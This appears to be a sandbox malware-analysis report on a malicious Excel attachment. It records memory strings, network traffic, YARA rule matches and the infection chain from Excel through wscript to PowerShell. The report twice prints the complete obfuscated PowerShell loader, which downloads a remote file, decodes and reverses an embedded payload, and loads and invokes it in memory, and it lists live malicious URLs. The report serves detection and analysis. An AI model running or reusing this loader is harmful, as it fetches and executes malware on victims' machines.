    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: powershell.exe, 0000000D.00000002.472460335.0000000005012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: powershell.exe, 0000000D.00000002.471392095.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: powershell.exe, 0000000B.00000002.473369989.0000000002638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.471392095.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: powershell.exe, 0000000D.00000002.471392095.0000000002999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.fil
    Source: powershell.exe, 0000000D.00000002.471392095.0000000002719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
    Source: powershell.exe, 0000000D.00000002.471392095.0000000002719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
    Source: powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: ljg.cl.url.3.drString found in binary or memory: https://ljg.cl/
    Source: Pedido No 4500924462.xls, 8A830000.0.dr, ~DF5A3DDFB1D8F2532B.TMP.0.drString found in binary or memory: https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange
    Source: powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
    Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
    Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49167 version: TLS 1.2

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: Process Memory Space: powershell.exe PID: 3924, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
    Excel sheet contains many unusual embedded objects
    Source: Pedido No 4500924462.xlsOLE: Microsoft Excel 2007+
    Source: 8A830000.0.drOLE: Microsoft Excel 2007+
    Microsoft Office drops suspicious files
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ljg.cl.urlJump to behavior
    Windows Scripting host queries suspicious COM object (likely to drop second stage)
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: Pedido No 4500924462.xlsOLE indicator, VBA macros: true
    Source: Pedido No 4500924462.xlsStream path 'MBD0006D5BA/\x1Ole' : https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&sliceqSO Z96VaPQ@I026S<M6Ap1ZPBoiv6Ktf0rVQvWqdAG9kDz8sKW9DU58iFm0c2B0WEhemuGidA3Q0eXT4KdfYRv3TQGviBsMCykuXeVAfQIdh4RdQfv3yJ5gvcrBCupNnvu01UdpmhczxrOuNXv0Qrqu8XFNMe209dLl6nfyyWnfLj+<@7YYHXil%
    Source: ~WRF{498AB1A3-A070-4AC4-B443-2EA9C1DC4C55}.tmp.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2446
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2446Jump to behavior
    Source: Process Memory Space: powershell.exe PID: 3924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
    Source: classification engineClassification label: mal100.expl.evad.winXLS@9/28@10/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\8A830000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7E62.tmpJump to behavior
    Source: Pedido No 4500924462.xlsOLE indicator, Workbook stream: true
    Source: 8A830000.0.drOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................~............................0...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................~............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................~....................`.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................~............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.3.2................................~....................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................~............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............*..........................~............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............7..........................~............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............J..........................~............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............V..........................~............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............h..........................~............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............t..........................~............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................~....................T.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................~............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d..........................................~............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................~............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................P.a.r.a.m.e.t.e.r. .n.a.m.e.:. .b.y.t.e.s."........................s....................,.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.1................................s....................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............:..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............N..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............Z..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............l..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............x..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s....................f.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s....................j.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.0.6................................s....................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............,..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............8..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............J..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............V..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............h..........................s....................`.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............t..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s....................j.......................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.5.1................................s....................$.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d..........................................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............'..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............3..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............E..........................s....................`.......(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............Q..........................s............................................Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....\.......d...............c..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....\.......d...............o..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................F.a.l.s.e.P.....\.......d...............u..........................s............................(...............Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................l.s.(.P.....\.......d...............y..........................s............................(...............Jump to behavior
